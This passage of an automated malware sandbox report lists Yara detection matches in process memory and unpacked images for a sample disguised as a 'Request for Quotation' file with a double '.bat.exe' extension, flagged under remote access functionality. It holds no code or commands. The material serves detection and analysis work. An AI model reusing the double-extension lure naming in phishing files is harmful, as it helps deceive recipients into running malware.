Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7636, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7636, type: MEMORYSTR